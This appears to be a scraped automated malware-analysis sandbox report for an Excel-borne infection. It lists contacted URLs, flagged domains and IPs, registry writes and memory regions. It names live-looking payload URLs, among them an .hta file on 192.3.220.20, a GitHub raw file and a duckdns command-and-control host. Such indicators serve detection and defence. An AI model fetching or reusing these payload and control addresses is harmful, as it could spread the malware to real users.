http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaC:
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htahttp://192.3.220.20/97/ug/Newprojectupdate
unknown
http://go.micros
unknown
https://stylite.io/noDeu
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
https://stylite.io/noDeta
unknown
https://stylite.io/noDe3
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFl
unknown
https://stylite.io/noDe
213.183.76.21
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFp
unknown
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaC
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
https://stylite.io/p
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://go.cr
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
http://schemas.dmtf.or
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
https://stylite.io/k
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.111.133
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://192.3.220.20/
unknown
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta5
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercont
unknown
http://192.3.220.20/97/picturewi
unknown
https://stylite.io/G
unknown
http://geoplugin.net/json.gpw
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta0
unknown
http://crl.usertru
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
https://stylite.io/K
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://raw.githubusercontent.com
unknown
https://stylite.io/
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectO
unknown
http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF6
unknown
http://raw.githubusercontent.com
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://stylite.io/1
unknown
http://www.imvu.com/OK
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 85 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
idabo.duckdns.org
135.148.195.248
 malicious
stylite.io
213.183.76.21
raw.githubusercontent.com
185.199.111.133
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
135.148.195.248
idabo.duckdns.org
United States
malicious
192.3.220.20
unknown
United States
malicious
213.183.76.22
unknown
Germany
213.183.76.21
stylite.io
Germany
178.237.33.50
geoplugin.net
Netherlands
185.199.111.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
4x/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28FD1
28FD1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
~~/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\326C2
326C2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3280A
3280A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32E8F
32E8F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3280A
3280A
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Rmc-I89M3S
exepath
HKEY_CURRENT_USER\Software\Rmc-I89M3S
licence
HKEY_CURRENT_USER\Software\Rmc-I89M3S
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 84 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
244E000
stack
page read and write
 malicious
791000
heap
page read and write
 malicious
931000
heap
page read and write
 malicious
7CF000
heap
page read and write
 malicious
3AC2000
heap
page read and write
 malicious
775000
heap
page read and write
 malicious
1239D000
trusted library allocation
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
594000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4DF000
heap
page read and write
3327000
trusted library allocation
page read and write
21E000
stack
page read and write
7FE89A62000
trusted library allocation
page read and write
39E4000
heap
page read and write
50D000
heap
page read and write
775000
heap
page read and write
430000
trusted library allocation
page read and write
4D41000
heap
page read and write
3FC0000
trusted library allocation
page read and write
1A7000
heap
page read and write
7FE89940000
trusted library allocation
page execute and read and write
123B1000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
55A000
heap
page read and write
4B9F000
heap
page read and write
2DFF000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
4D2D000
heap
page read and write
2357000
trusted library allocation
page read and write
24C000
stack
page read and write
1E1E000
heap
page execute and read and write
4961000
heap
page read and write
1A590000
heap
page read and write
2298000
trusted library allocation
page read and write
40E000
heap
page read and write
13652000
trusted library allocation
page read and write
4A02000
heap
page read and write
2B13000
trusted library allocation
page read and write
39C000
heap
page read and write
730000
heap
page read and write
3FC0000
trusted library allocation
page read and write
3A0000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
4E3A000
heap
page read and write
7FE898D0000
trusted library allocation
page read and write
4FA0000
heap
page read and write
1E56000
heap
page read and write
656000
heap
page read and write
2DFF000
trusted library allocation
page read and write
56D000
heap
page read and write
3A60000
heap
page read and write
123D1000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
3B95000
trusted library allocation
page read and write
39A0000
trusted library allocation
page read and write
7FE89883000
trusted library allocation
page execute and read and write
37A0000
trusted library allocation
page read and write
16F000
heap
page read and write
1CF5000
heap
page read and write
474000
heap
page read and write
228F000
stack
page read and write
3A00000
heap
page read and write
3D0000
trusted library allocation
page read and write
16F000
heap
page read and write
468000
heap
page read and write
1A940000
heap
page read and write
1A350000
heap
page read and write
46B000
heap
page read and write
4B10000
heap
page read and write
22DF000
stack
page read and write
2360000
trusted library allocation
page read and write
1CA2B000
heap
page read and write
2DFF000
trusted library allocation
page read and write
1C810000
heap
page read and write
399D000
heap
page read and write
4BF3000
heap
page read and write
4D19000
heap
page read and write
10000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
D0000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
481000
heap
page read and write
2881000
trusted library allocation
page read and write
2336000
heap
page read and write
41F000
heap
page read and write
22B1000
trusted library allocation
page read and write
2720000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
59D000
direct allocation
page read and write
23BF000
trusted library allocation
page read and write
3159000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
1C1000
heap
page read and write
3B37000
heap
page read and write
2B2E000
trusted library allocation
page read and write
4D31000
heap
page read and write
299E000
stack
page read and write
1C15E000
stack
page read and write
39CC000
heap
page read and write
123B1000
trusted library allocation
page read and write
258D000
trusted library allocation
page read and write
1B21E000
stack
page read and write
2F1E000
stack
page read and write
3631000
heap
page read and write
508000
heap
page read and write
496D000
heap
page read and write
141000
heap
page read and write
3162000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
1B24E000
stack
page read and write
7FE89BA0000
trusted library allocation
page read and write
7FE89C30000
trusted library allocation
page read and write
1C510000
heap
page read and write
4CEA000
heap
page read and write
4FBD000
heap
page read and write
2DE000
heap
page read and write
2D6F000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
20000
heap
page read and write
10000
heap
page read and write
3614000
heap
page read and write
3799000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
3157000
trusted library allocation
page read and write
4A11000
heap
page read and write
B90000
heap
page read and write
436000
heap
page read and write
4E3A000
heap
page read and write
1F97000
direct allocation
page read and write
21E0000
heap
page read and write
3E0000
trusted library allocation
page read and write
3DE000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89966000
trusted library allocation
page execute and read and write
39A3000
heap
page read and write
35A0000
heap
page read and write
7FE89996000
trusted library allocation
page execute and read and write
360000
heap
page read and write
2A8000
heap
page read and write
4780000
trusted library allocation
page read and write
1C3D0000
heap
page read and write
563000
heap
page read and write
52E5000
heap
page read and write
1A538000
heap
page execute and read and write
12466000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
1C65D000
stack
page read and write
1B5000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
1CB34000
heap
page read and write
1AA000
heap
page read and write
572000
heap
page read and write
1C1D5000
heap
page read and write
4A3A000
heap
page read and write
37A0000
trusted library allocation
page read and write
326E000
stack
page read and write
3B5E000
heap
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
3920000
heap
page read and write
4AFC000
heap
page read and write
320000
heap
page read and write
37A5000
trusted library allocation
page read and write
5C9000
heap
page read and write
1C780000
trusted library section
page read and write
4D19000
heap
page read and write
37DF000
heap
page read and write
584000
heap
page read and write
57C000
heap
page read and write
1F93000
direct allocation
page read and write
428000
heap
page read and write
7FE89C1B000
trusted library allocation
page read and write
56A000
heap
page read and write
7FE89A33000
trusted library allocation
page read and write
1A4BA000
stack
page read and write
120000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
555000
heap
page read and write
2B0F000
trusted library allocation
page read and write
1B28E000
stack
page read and write
4D31000
heap
page read and write
1B96E000
stack
page read and write
1DA0000
direct allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
470000
heap
page read and write
1A7E4000
heap
page execute and read and write
551000
heap
page read and write
10000
heap
page read and write
39C4000
heap
page read and write
2B44000
trusted library allocation
page read and write
7FE89A92000
trusted library allocation
page read and write
1B1000
heap
page read and write
57C000
heap
page read and write
4D1000
heap
page read and write
2DFF000
trusted library allocation
page read and write
53C000
heap
page read and write
E0000
heap
page read and write
4A08000
heap
page read and write
228F000
stack
page read and write
39BD000
heap
page read and write
1CB55000
heap
page read and write
326000
heap
page read and write
3670000
trusted library allocation
page execute
2333000
trusted library allocation
page read and write
4240000
trusted library allocation
page read and write
4FB3000
heap
page read and write
4D2D000
heap
page read and write
2E5E000
stack
page read and write
3774000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
1AA0E000
heap
page read and write
1CA57000
heap
page read and write
39FA000
heap
page read and write
12351000
trusted library allocation
page read and write
47B1000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
5A0000
direct allocation
page read and write
4848000
heap
page read and write
4FA1000
heap
page read and write
2AA0000
trusted library allocation
page read and write
7FE89BA9000
trusted library allocation
page read and write
1C115000
heap
page read and write
41A000
heap
page read and write
264F000
stack
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1A3A4000
heap
page execute and read and write
7FE89B00000
trusted library allocation
page read and write
800000
heap
page read and write
328E000
trusted library allocation
page read and write
3FF0000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
14E000
heap
page read and write
1B78B000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4964000
heap
page read and write
4FB1000
heap
page read and write
1ACD5000
heap
page read and write
38E3000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
14F000
heap
page read and write
1ACD0000
heap
page read and write
1FA3000
direct allocation
page read and write
4A85000
heap
page read and write
397000
heap
page read and write
4BFF000
heap
page read and write
5C9000
heap
page read and write
1C1B3000
heap
page read and write
2DF5000
trusted library allocation
page read and write
34F0000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
7C4000
heap
page read and write
4D31000
heap
page read and write
2D8000
heap
page read and write
56D000
heap
page read and write
2AFC000
trusted library allocation
page read and write
3799000
trusted library allocation
page read and write
1B63D000
stack
page read and write
28C3000
trusted library allocation
page read and write
1BFA5000
heap
page read and write
2D6B000
trusted library allocation
page read and write
149000
heap
page read and write
39BD000
heap
page read and write
47E5000
heap
page read and write
510000
heap
page read and write
10000
heap
page read and write
3F0000
heap
page read and write
1B440000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
1AB6F000
stack
page read and write
69D000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
7FE89A22000
trusted library allocation
page read and write
7FE89BCD000
trusted library allocation
page read and write
429F000
stack
page read and write
387000
heap
page read and write
38D000
heap
page read and write
3631000
heap
page read and write
252000
stack
page read and write
389000
heap
page read and write
1A8F1000
heap
page read and write
1C200000
heap
page read and write
2F40000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
4B10000
heap
page read and write
2B48000
trusted library allocation
page read and write
2560000
heap
page read and write
29A5000
heap
page read and write
271D000
trusted library allocation
page read and write
35A2000
heap
page read and write
256E000
stack
page read and write
1CA7C000
heap
page read and write
2DFF000
trusted library allocation
page read and write
12478000
trusted library allocation
page read and write
1A778000
stack
page read and write
4EC000
heap
page read and write
122B1000
trusted library allocation
page read and write
272F000
stack
page read and write
53E000
heap
page read and write
1A55C000
stack
page read and write
3A0000
heap
page read and write
B9E000
heap
page read and write
3840000
heap
page read and write
315B000
trusted library allocation
page read and write
124D5000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
4A65000
heap
page read and write
3BC1000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1C9DC000
heap
page read and write
464000
heap
page read and write
1A5C0000
heap
page read and write
1A56E000
heap
page execute and read and write
2B21000
trusted library allocation
page read and write
12D000
heap
page read and write
7FE89884000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
7FE89B75000
trusted library allocation
page read and write
327F000
trusted library allocation
page read and write
470000
heap
page read and write
530000
heap
page read and write
1AA19000
stack
page read and write
2D6B000
trusted library allocation
page read and write
4B6B000
heap
page read and write
3640000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
3931000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
4D3D000
heap
page read and write
4BF7000
heap
page read and write
7FE89976000
trusted library allocation
page execute and read and write
3B0000
heap
page read and write
4A80000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
1B0AF000
stack
page read and write
1A57C000
heap
page read and write
7FE89C19000
trusted library allocation
page read and write
39D3000
heap
page read and write
39BC000
heap
page read and write
36EB000
trusted library allocation
page read and write
4FB000
heap
page read and write
1B17E000
stack
page read and write
123A1000
trusted library allocation
page read and write
10000
heap
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
4BA5000
heap
page read and write
D0000
heap
page read and write
1AC000
heap
page read and write
7FE89890000
trusted library allocation
page read and write
1B226000
heap
page read and write
4B6A000
heap
page read and write
1ACFC000
heap
page read and write
4E3A000
heap
page read and write
4ABF000
heap
page read and write
320000
heap
page read and write
1B1EE000
stack
page read and write
1B5B0000
heap
page read and write
41B000
system
page execute and read and write
4BFF000
heap
page read and write
140000
heap
page read and write
252000
heap
page read and write
326000
heap
page read and write
2800000
trusted library allocation
page read and write
37A5000
trusted library allocation
page read and write
39A7000
heap
page read and write
1A5EF000
stack
page read and write
92C000
heap
page read and write
4EC000
heap
page read and write
4B6B000
heap
page read and write
1C213000
heap
page read and write
4A81000
heap
page read and write
4D2D000
heap
page read and write
1A300000
heap
page read and write
2AE2000
trusted library allocation
page read and write
59F000
direct allocation
page read and write
1A6E0000
heap
page execute and read and write
7FE898A4000
trusted library allocation
page read and write
1BA000
heap
page read and write
1A7E8000
heap
page execute and read and write
367E000
stack
page read and write
3CBC000
stack
page read and write
734000
heap
page read and write
56A9000
heap
page read and write
43E000
heap
page read and write
2B5B000
trusted library allocation
page read and write
39D0000
trusted library allocation
page read and write
33F000
heap
page read and write
3919000
heap
page read and write
493000
direct allocation
page read and write
106000
heap
page read and write
10000
heap
page read and write
2DF5000
trusted library allocation
page read and write
7FE89884000
trusted library allocation
page read and write
39AC000
heap
page read and write
13033000
trusted library allocation
page read and write
36C000
stack
page read and write
1C1DF000
heap
page read and write
276A000
trusted library allocation
page read and write
392F000
heap
page read and write
7FE898C3000
trusted library allocation
page read and write
1AA20000
heap
page read and write
4D41000
heap
page read and write
2DE8000
trusted library allocation
page read and write
46B000
heap
page read and write
1C4D9000
heap
page read and write
3283000
trusted library allocation
page read and write
3A01000
heap
page read and write
7FE89A88000
trusted library allocation
page read and write
328C000
trusted library allocation
page read and write
3663000
heap
page read and write
2D6E000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
240000
heap
page read and write
2DFF000
trusted library allocation
page read and write
1A8B3000
heap
page read and write
4D0B000
heap
page read and write
543000
heap
page read and write
530000
heap
page read and write
1C31E000
stack
page read and write
1B5B4000
heap
page read and write
4848000
heap
page read and write
3327000
trusted library allocation
page read and write
436000
heap
page read and write
4964000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
3F6000
heap
page read and write
1CA17000
heap
page read and write
1A944000
heap
page read and write
53A000
heap
page read and write
1BB45000
heap
page read and write
4D0E000
heap
page read and write
5BB000
heap
page read and write
22FF000
stack
page read and write
3590000
heap
page read and write
3327000
trusted library allocation
page read and write
30AE000
stack
page read and write
78C000
heap
page read and write
4D3D000
heap
page read and write
1B30E000
stack
page read and write
1AA96000
heap
page read and write
750000
heap
page read and write
315000
stack
page read and write
1B1E6000
heap
page read and write
1248E000
trusted library allocation
page read and write
3278000
trusted library allocation
page read and write
3F50000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
1A9000
heap
page read and write
3760000
heap
page read and write
4D2D000
heap
page read and write
3614000
heap
page read and write
3634000
heap
page read and write
25B000
stack
page read and write
38E6000
heap
page read and write
5B8000
heap
page read and write
1B5B9000
heap
page read and write
20E000
heap
page read and write
124000
heap
page read and write
159000
heap
page read and write
286E000
trusted library allocation
page read and write
127000
stack
page read and write
4BF7000
heap
page read and write
1AD58000
heap
page read and write
4FA9000
heap
page read and write
4D31000
heap
page read and write
38E2000
heap
page read and write
247F000
stack
page read and write
46B000
heap
page read and write
3590000
heap
page read and write
10A000
heap
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
12A9A000
trusted library allocation
page read and write
373000
heap
page read and write
359B000
heap
page read and write
3B89000
trusted library allocation
page read and write
7FE89A53000
trusted library allocation
page read and write
A10000
heap
page read and write
48A000
heap
